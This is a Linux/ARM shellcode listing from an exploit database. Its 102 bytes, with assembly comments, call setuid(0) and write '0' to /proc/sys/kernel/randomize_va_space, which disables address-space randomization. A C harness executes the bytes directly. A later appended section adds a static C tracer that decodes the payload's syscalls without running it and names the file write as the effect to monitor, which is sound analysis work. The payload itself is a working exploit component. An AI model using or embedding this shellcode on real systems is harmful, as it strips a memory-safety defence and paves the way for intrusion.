
linux/ARM - Disable ASLR Security - 102 bytes

Posted on 30 June 2010

/*
Title:   Linux/ARM - Disable ASLR Security - 102 bytes
Date:    2010-06-20
Tested:  Linux ARM9 2.6.28-6-versatile

Author:  Jonathan Salwan
Web:     http://shell-storm.org | http://twitter.com/shell_storm

! Database of shellcodes http://www.shell-storm.org/shellcode/

Description:
============
Address space layout randomization (ASLR) is a computer security technique
which involves randomly arranging the positions of key data areas, usually
including the base of the executable and position of libraries, heap, and
stack, in a process's address space.

This shellcode disables the ASLR on linux/ARM
*/

#include <stdio.h>
#include <string.h>   /* strlen() */

char *SC = "\x01\x30\x8f\xe2"   // add   r3, pc, #1   (ARM mode)
           "\x13\xff\x2f\xe1"   // bx    r3           (switch to Thumb)
           /* setuid(0) */
           "\x24\x1b"           // subs  r4, r4, r4
           "\x20\x1c"           // adds  r0, r4, #0
           "\x17\x27"           // movs  r7, #23
           "\x01\xdf"           // svc   1
           /* open(path, 1089, 0644): r1 = 5*200 + 89, r2 = 2*200 + 20 */
           "\x78\x46"           // mov   r0, pc
           "\x2e\x30"           // adds  r0, #46
           "\xc8\x21"           // movs  r1, #200
           "\xc8\x31"           // adds  r1, #200
           "\xc8\x31"           // adds  r1, #200
           "\xc8\x31"           // adds  r1, #200
           "\xc8\x31"           // adds  r1, #200
           "\x59\x31"           // adds  r1, #89
           "\xc8\x22"           // movs  r2, #200
           "\xc8\x32"           // adds  r2, #200
           "\x14\x32"           // adds  r2, #20
           "\x05\x27"           // movs  r7, #5
           "\x01\xdf"           // svc   1
           /* write(3, "0\n", 2) */
           "\x03\x20"           // movs  r0, #3
           "\x79\x46"           // mov   r1, pc
           "\x0e\x31"           // adds  r1, #14
           "\x02\x22"           // movs  r2, #2
           "\x04\x27"           // movs  r7, #4
           "\x01\xdf"           // svc   1
           /* exit(0) */
           "\x92\x1a"           // subs  r2, r2, r2
           "\x10\x1c"           // adds  r0, r2, #0
           "\x01\x27"           // movs  r7, #1
           "\x01\xdf"           // svc   1
           /* data: "0\n", "--", "//proc/sys/kernel/randomize_va_space" */
           "\x30\x0a"           // ^
           "\x2d\x2d"           // |
           "\x2f\x2f"           // |
           "\x70\x72"           // |
           "\x6f\x63"           // |
           "\x2f\x73"           // |
           "\x79\x73"           // |
           "\x2f\x6b"           // |
           "\x65\x72"           // |
           "\x6e\x65"           // |  [ strings ]
           "\x6c\x2f"           // |
           "\x72\x61"           // |
           "\x6e\x64"           // |
           "\x6f\x6d"           // |
           "\x69\x7a"           // |
           "\x65\x5f"           // |
           "\x76\x61"           // |
           "\x5f\x73"           // |
           "\x70\x61"           // |
           "\x63\x65";          // v

int main(void)
{
        fprintf(stdout, "Length: %d\n", (int)strlen(SC));
        (*(void(*)()) SC)();
        return 0;
}

# Inj3ct0r.com (http://inj3ct0r.com/) [2010-06-30]
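For triage, the payload can be read statically instead of run. The following is an added example, not part of the original listing or the author's code: a small C tracer that walks the Thumb half of the bytes shown above and records r7/r0/r1/r2 at each `svc`. The names `trace_syscalls`, `struct sc_call`, `SC_LEN` and `THUMB_ENTRY` are this example's own, and it assumes the ARM Linux syscall numbering (23 setuid, 5 open, 4 write, 1 exit).

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example. The 102 payload bytes from the listing above; never executed here. */
static const uint8_t SC[] =
    "\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x24\x1b\x20\x1c\x17\x27\x01\xdf"
    "\x78\x46\x2e\x30\xc8\x21\xc8\x31\xc8\x31\xc8\x31\xc8\x31\x59\x31"
    "\xc8\x22\xc8\x32\x14\x32\x05\x27\x01\xdf\x03\x20\x79\x46\x0e\x31"
    "\x02\x22\x04\x27\x01\xdf\x92\x1a\x10\x1c\x01\x27\x01\xdf"
    "0\n--//proc/sys/kernel/randomize_va_space";
enum { SC_LEN = sizeof SC - 1, THUMB_ENTRY = 8 }; /* the ARM bx lands on offset 8 */
struct sc_call { uint32_t nr, a0, a1, a2; };      /* r7, r0, r1, r2 at each svc */

/* Decodes only the six 16-bit Thumb forms this payload uses. Values produced by
   `mov rd, pc` are offsets into the buffer. Syscall return values are not
   modelled; the payload itself hardcodes fd 3 rather than using open's result. */
static size_t trace_syscalls(const uint8_t *p, size_t len, size_t start,
                             struct sc_call *out, size_t max)
{
    uint32_t r[8] = {0};
    size_t n = 0;
    for (size_t pc = start; pc + 1 < len && n < max; pc += 2) {
        unsigned op = p[pc] | (p[pc + 1] << 8);   /* little-endian halfword */
        unsigned rd = op & 7, rn = (op >> 3) & 7, x = (op >> 6) & 7, rd8 = (op >> 8) & 7;
        if      ((op & 0xf800) == 0x2000) r[rd8] = op & 0xff;       /* movs rd, #imm8 */
        else if ((op & 0xf800) == 0x3000) r[rd8] += op & 0xff;      /* adds rd, #imm8 */
        else if ((op & 0xfe00) == 0x1a00) r[rd] = r[rn] - r[x];     /* subs rd, rn, rm */
        else if ((op & 0xfe00) == 0x1c00) r[rd] = r[rn] + x;        /* adds rd, rn, #imm3 */
        else if ((op & 0xfff8) == 0x4678) r[rd] = (uint32_t)pc + 4; /* mov rd, pc */
        else if ((op & 0xff00) == 0xdf00) {                         /* svc */
            out[n++] = (struct sc_call){ r[7], r[0], r[1], r[2] };
            if (r[7] == 1) break;                                   /* exit ends the trace */
        } else break;                                               /* unknown opcode: stop */
    }
    return n;
}

int main(void)
{
    struct sc_call c[8];
    size_t n = trace_syscalls(SC, SC_LEN, THUMB_ENTRY, c, 8);
    for (size_t i = 0; i < n; i++)
        printf("svc nr=%u r0=%u r1=%u r2=%u\n", (unsigned)c[i].nr,
               (unsigned)c[i].a0, (unsigned)c[i].a1, (unsigned)c[i].a2);
    if (n > 1) printf("open path (%zu bytes): %s\n",
                      strlen((const char *)SC + c[1].a0), (const char *)SC + c[1].a0);
    return 0;
}
```

The recovered open flags, 1089, are O_WRONLY|O_CREAT|O_APPEND, and the write sends the two bytes "0\n" to /proc/sys/kernel/randomize_va_space, so write access to that file and a value of 0 in it are the observable effects to monitor for.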

 
